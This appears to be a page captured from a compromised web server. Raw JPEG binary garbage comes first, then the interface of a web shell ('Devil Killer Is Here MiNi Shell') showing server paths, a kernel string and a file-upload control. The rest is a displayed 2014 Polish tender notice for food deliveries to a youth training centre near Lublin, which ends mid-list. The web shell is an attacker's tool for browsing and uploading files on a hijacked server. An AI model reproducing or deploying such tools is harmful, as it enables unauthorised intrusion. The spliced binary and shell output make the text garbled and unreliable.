JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140401/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140401/110232-N-2014.html

<p class="kh_header"><b>Lublin: Dostawa artykułów żywnościowych do Ośrodka Szkolenia i Wychowania w Radzyniu Podlaskim</b><br>
<b>Numer ogłoszenia: 110232 - 2014; data zamieszczenia: 01.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy Lubelska Wojewódzka Komenda , ul. Wojciechowska 7, 20-704 Lublin, woj. lubelskie, tel. 081 5245108/09 w.13, faks 081 5245108/09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubelska.ohp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: OCHOTNICZE HUFCE PRACY.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych do Ośrodka Szkolenia i Wychowania w Radzyniu Podlaskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.1. Przedmiotem zamówienia jest dostawa artykułów żywnościowych do Ośrodka Szkolenia i Wychowania w Radzyniu Podlaskim, mieszczącego się przy ul. Lubelskiej 25, 21 300 Radzyń Podlaski.
Oferowane artykuły żywnościowe muszą być dopuszczone do obrotu oraz posiadać dobrą jakość. Produkty te powinny odpowiadać, co do jakości, wymogom wyrobów dopuszczonych do obrotu i stosowania w zbiorowym żywieniu. 
Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do SIWZ.
Dostawy będą wykonywane do wyczerpania środków Zamawiającego na ten przedmiot zamówienia.
Zgodnie z art. 29 ust. 3 ustawy Prawo zamówień publicznych Zamawiający w niniejszym postępowaniu dopuszcza składanie ofert równoważnych a wszelkie składniki przedmiotu zamówienia określone za pomocą  nazw producenta, określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać dostarczane artykuły, aby spełniać opisane poniżej wymagania zamówienia.
3.1.2. MIEJSCE DOSTAWY Ośrodek Szkolenia i Wychowania w Radzyniu Podlaskim, ul. Lubelska 25, 21 300 Radzyń Podlaski.
3.1.3. SPOSÓB DOSTAWY dostawy będą następować cyklicznie stosownie do potrzeb Zamawiającego od dnia podpisania umowy do 31 grudnia 2014 roku, po uprzednim telefonicznym ustaleniu, z wyprzedzeniem jednodniowym przez Zamawiającego wielkości 
i terminu dostawy. Wykonawca realizuje zamówienie zgodnie z wymogami Zamawiającego, dzień dostawy zawsze wyznaczany jest przez osobę odpowiedzialną za zamówienia artykułów żywnościowych w jednostce organizacyjne LWK OHP. Wykonawca bezwzględnie musi stosować się do potrzeb i wymogów Zamawiającego.
Osoba odpowiedzialna za dostawy: Małgorzata Prokopiuk, tel. 083 352 11 03..
3.1.4. Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może złożyć ofertę na jedną lub więcej części
Część 1	ryby przetworzone i konserwowane,
Część 2	owoce, warzywa i podobne produkty,
Część 3	oleje i tłuszcze zwierzęce lub roślinne,
Część 4	produkty mleczarskie,
Część 5	produkty przemiału ziarna, skrobi i produktów skrobiowych,
Część 6	różne produkty spożywcze - pozostałe,
Część 7	napoje bezalkoholowe,
Część 8	produkty zwierzęce, mięso i produkty mięsne,
Część 9	pieczywo, świeże wyroby piekarskie i ciastkarskie,
Część 10	świeży drób,
Część 11	produkty mrożone..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-6, 15.80.00.00-6, 15.98.00.00-1, 15.10.00.00-9, 15.81.00.00-9, 15.11.21.00-7, 15.33.11.70-9, 15.22.10.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla części: 1, 4, 8 i 10
5.1.1. posiadanie wiedzy i doświadczenia
wykonanie w okresie ostatnich 3 lat przed wszczęciem postępowania a jeśli okres prowadzenia działalności jest krótszy w tym okresie minimum 2 dostaw artykułów żywnościowych o wartości równej lub większej niż 30 000,00 zł brutto każda,
dla części: 2, 3, 5, 6, 7 i 9
5.1.1. posiadanie wiedzy i doświadczenia
wykonanie w okresie ostatnich 3 lat przed wszczęciem postępowania a jeśli okres prowadzenia działalności jest krótszy  w tym okresie minimum 2 dostaw artykułów żywnościowych o wartości równej lub większej niż 30 000,00 zł brutto każda,
dla części 11
5.1.1. posiadanie wiedzy i doświadczenia
wykonanie w okresie ostatnich 3 lat przed wszczęciem postępowania a jeśli okres prowadzenia działalności jest krótszy  w tym okresie minimum 2 dostaw artykułów żywnościowych o wartości równej lub większej niż 30 000,00 zł brutto każda,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dla części: 1, 4, 8 i 10

5.1.2 dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia
dysponowanie sprawnym pod względem technicznym samochodem, z działającą prawidłowo zabudową izotermiczną lub chłodnią, 

dla części 11
5.1.2 dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia:
 dysponowanie sprawnym pod względem technicznym samochodem, z działającą prawidłowo mroźnią.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, z zastrzeżeniem ust. 2
2.     Strony przewidują możliwość wprowadzenia następujących zmian w umowie: 
1 zmiana stawki i kwoty podatku Vat.
2 zmiana terminu realizacji przedmiotu zamówienia, w przypadku
a działania siły wyższej, uniemożliwiającej wykonanie umowy w określonym pierwotnie terminie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lubelska.ohp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Wojciechowska 7, 20-704 Lublin pok. 216.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.04.2014 godzina 10:00, miejsce: ul. Wojciechowska 7, 20-704 Lublin pok. 216.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ryby przetworzone i konserwowane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Tuńczyk w sosie własnym konserwa 
Płaty śledziowe a la matias
Konserwa rybna śledź w oleju
Konserwa rybna śledź  w pomidorach
Konserwa rybna filet z makreli w oleju
Konserwa rybna filet z makreli w pomidorach
Konserwa rybna szprot w oleju
Ryba mrożona  filet z pangi
Karp żywy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> owoce i warzywa świeże oraz produkty owocowe i warzywne przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas w puszce 
Chrzan w słoiku RĘBEK lub równoważny
Dżem niskosłodzony wiśniowy 
Dżem niskosłodzony truskawkowy
Powidła śliwkowe 
Groszek konserwowy 
Grzyby suszone całe podgrzybek
Kapusta kiszona biała bez octu
Kapusta kiszona czerwona bez octu
Kukurydza konserwowa słodka bez konserwantów
Koncentrat pomidorowy 30%
Ogórek konserwowy 
Ogórek kiszony
Ogórek małosolny
Papryka marynowana słodka FRUKTUS lub równoważna
Pieczarka marynowana 
Pietruszka suszona nać
Sałatka babuni PTAK lub równoważna
Sałatka szwedzka ogórkowa SMAK lub równoważna
Sałatka grecka KUCHNIA POLSKA lub równoważna
Sałatka pyszna FRUKTUS lub równoważna
Szczaw konserwowy 
Banany
Burak czerwony ćwikłowy
Cebula biała zwyczajna
Cytryna
Fasola zwyczajna biała łuskana
Groch łuskany połówki
Jabłka Jonagold
Jabłka McIntosh
Jabłka Champion
Kalafior biały
Kapusta biała jesienna
Kapusta biała młoda
Kapusta czerwona
Kapusta pekińska
Marchew korzeń
Ogórek gruntowy
Papryka żółta
Papryka czerwona świeża 
Papryka zielona świeża 
Pieczarki 
Pietruszka korzeń
Pomidor kl. I
Por 
Rzodkiewka pęczek
Sałata główka masłowa
Seler korzeń
Soczewica zielona
Szczypior pęczek
Ziemniaki jesienne Vineta
Ziemianki młode Irys
Brokuł zielony

Czosnek krajowy główka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> oleje i tłuszcze zwierzęce lub roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Olej roślinny kujawski lub równoważny
Margaryna Kasia lub równoważna
Margaryna śniadaniowa lub równoważna.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jogurt owocowy 150 g Jogobella smak: truskawka, malina, brzoskwinia, poziomka lub równoważny
Masło śmietankowe tłuszcz min. 74 % 
Mleko 2 %
Śmietana 18 % 
Ser żółty Salami SPOMLEK SERENADA lub równoważny
Ser żółty Gouda SPOMLEK SERENADA lub równoważny
Ser żółty Podlaski z Filipowa lub równoważny
Twaróg półtłusty
Serek twarogowy wiejski 150 g Piątnica lub równoważny
Ser topiony min. 60% tłuszczu kostka 100 g
Serek topiony trójkąt Holland lub równoważny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> produkty przemiału ziarna, skrobi i produktów skrobiowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kasza gryczana 
Mąka pszenna 500
Mąka ziemniaczana 
Ryż biały długoziarnisty
Kasza jęczmienna drobna.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> różne produkty spożywcze  pozostałe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka tarta
Baton czekoladowy typu Pawełek lub równoważny
Cukier kryształ biały
Cukier wanilinowy 
Herbata liściasta czarna  GOLDEN ASSAM lub równoważna
Herbata EKOLAND rozpuszczalna lub równoważna
Kakao naturalne w proszku DecoMorreno lub równoważne
Kawa zbożowa 
Ketchup łagodny koncentrat pomidorowy min. 37%,  bez konserwantów
Liść laurowy suszony 
Wafelek z nadzieniem 50 g
Kisiel wiśniowy Winiary lub równoważny
Kisiel truskawkowy Winiary lub równoważny
Kisiel poziomkowy Winiary lub równoważny
Kisiel cytrynowy Winiary lub równoważny 
Kompot śliwkowy  słoik 
Konserwa mięsna Luncheon meat Łuków lub równoważna
Majonez dekoracyjny Winiary lub równoważny 
Makaron świderki Lubella lub równoważny
Makaron nitki Lubella lub równoważny
Makaron muszelki Lubella lub równoważny
Makaron krajanka Lubella lub równoważny
Makaron łazanki Lubella lub równoważny
Makaron spaghetti Lubella lub równoważny
Marmolada owocowa
Miód pszczeli 
Musztarda miodowa Parczew lub równoważna
Musztarda stołowa Parczew lub równoważna
Musztarda sarepska Parczew lub równoważna
Musztarda kremska Parczew lub równoważna
Musztarda delikatesowa Parczew lub równoważna
Majeranek suszony 
Ocet spirytusowy 10% 
Pasztet drobiowy Podlaski DROSET lub równoważny
Pasztet mazowiecki Łuków lub równoważny 
Pieprz prawdziwy czarny mielony 
Przyprawa do zup w płynie Winiary lub równoważna
Przyprawa typu Kucharek  lub równoważna
Przyprawa do bigosu CARUM lub równoważna
Przyprawa do kurczaka CARUM lub równoważna
Cynamon mielony 
Czosnek suszony mielony CARUM lub równoważna
Delikat do drobiu KNORR lub równoważny
Delikat do mięs KNORR lub równoważny
Delikat do ryb KNORR lub równoważny
Fix KNORR do gulaszu lub równoważny
Kwasek cytrynowy 
Ziele angielskie suszone całe
Rosół w kostce drobiowy WINIARY lub równoważny
Rosół drobiowy w paście KNORR lub równoważny 
Rosół wołowy w paście KNORR lub równoważny
Bulion grzybowy w proszku KNORR lub równoważny
Barszcz biały w proszku KNORR lub równoważny
Barszcz czerwony w proszku WINIARY lub równoważny
Sos bolognese KNORR lub równoważny
Sos do spaghetti KNORR lub równoważny
Sos pieczeniowy KNORR lub równoważny
Sos sałatkowy KNORR lub równoważny
Sos chrzanowy WINIARY lub równoważny
Sos czosnkowy WINIARY lub równoważny
Sos tatarski WINIARY lub równoważny
Sos włoski KNORR lub równoważny
Sól jodowana jadalna 
Syrop owocowy o smaku  malinowym Łowicz lub równoważny 
Zupa błyskawiczna typu Amino 70 g lub równoważna
Zupa ogonowa Knorr w proszku 
Zupa szparagowa Knorr w proszku 
Żurek w proszku KNORR lub równoważny
Jaja klasa A wielkość M o kodzie 0  2
Drożdże piekarskie normalne 100 g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> napoje bezalkoholowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Woda niegazowana 0,5 l
Woda gazowana 0,5 l
Woda niegazowana 5 l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> produkty zwierzęce, mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bok surowy łuskany chudy i mięsisty
Karkówka bez kości
Kości karkowe
Kości schabowe
Mięso mielone wieprzowe  co najmniej 65% mięsa wieprzowego, 35% tłuszczu
Mięso mielone wieprzowo  wołowe co najmniej 30% mięso wieprzowe,  35% mięso wołowe,  35% tłuszcz
Podgardle wieprzowe
Schab bez kości
Słonina
Szynka wieprzowa bez kości
Udziec wołowy bez kości
Wątróbka wieprzowa
Wołowina bez kości 
Żeberka paski
Kiełbasa biała surowa mięso wieprzowe min. 75%, mięso wołowe min. 25%

WĘDLINA
Baleron wędzony gotowany co najmniej 80% mięsa wieprzowego
Boczek faszerowany
Boczek pieczony wieprzowy co najmniej 60% mięsa
Boczek wędzony wieprzowy co najmniej 70% mięsa
Boczek wieprzowy pieczony z pietruszką co najmniej 60% mięsa
Golonka prasowana co najmniej 70% mięsa wieprzowego
Kaszanka co najmniej 15% wątroba wieprzowa, 15% podroby, 15% mięso wieprzowe 15% tłuszcz, kasza gryczana, krew
Kebabki co najmniej 80% mięso wieprzowe, 20% mięso wołowe
Kiełbasa firmowa co najmniej 70% mięsa wieprzowego
Kiełbasa krakowska co najmniej 70% mięso wieprzowe, 14% mięso wołowe
Kiełbasa parówkowa co najmniej 60% mięsa wieprzowego, 20% mięsa wołowego 
Kiełbasa piwna co najmniej 60% mięso wieprzowe, 30% mięso wołowe
Kiełbasa zwyczajna co najmniej 60% mięso wieprzowe, 30% mięso wołowe
Kiełbasa golonkowa co najmniej 80% mięso wieprzowe
Kiełbasa podwawelska co najmniej 70% mięso wieprzowe, 20% mięso wołowe
Kiełbasa toruńska 
Kiełbasa szynkowa co najmniej 60% mięso wieprzowe, 20% mięso wołowe
Kiełbasa żywiecka co najmniej 70% mięso wieprzowe, 20% mięso wołowe 
Kiełbasa grillowa co najmniej 70% mięso wieprzowe, 15% mięso wołowe
Łopatka myśliwska pieczona co najmniej 80% mięso wieprzowe
Mortadela co najmniej 70% mięso wieprzowe, 15% mięso wołowe
Mielonka tyrolska co najmniej 57% mięso wieprzowe, 15% mięso wołowe
Ogonówka co najmniej 80% mięso wieprzowe 
Pasztet mięsny co najmniej 30% mięso wieprzowe, 20% mięso wołowe, 8% wątroba wieprzowa
Pasztet drobiowy mięso z drobiu min.23%, wątroba drobiowa min. 12%, mięso oddzielone mechanicznie z drobiu min. 11%
Parówki śląskie co najmniej 41% mięsa wieprzowego, 14% mięsa wołowego
Pasztetowa co najmniej 35% podgardla, 15% boczek wieprzowy, 25% wątroby wieprzowej
Pieczeń węgierska co najmniej 47% mięso wieprzowe, 15% mięso wołowe 
Pieczeń  rzymska co najmniej 38% mięso wieprzowe, 32% mięso wołowe
Pierś wędzona z indyka co najmniej 80% filet z indyka
Polędwica drobiowa co najmniej 70% mięso drobiowe
Polędwica sopocka wieprzowa co najmniej 80% mięsa wieprzowego
Rolada schabowa wieprzowa co najmniej 80% mięsa wieprzowego
Salceson włoski co najmniej 34% mięsa wieprzowego, 15% ozór wieprzowy, 20 % serce, nerki, płuca
Szynka wieprzowa gotowana co najmniej 80% mięsa wieprzowego
Żeberka wieprzowe wędzone paski.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> pieczywo, świeże wyroby piekarskie i ciastkarskie.</p>
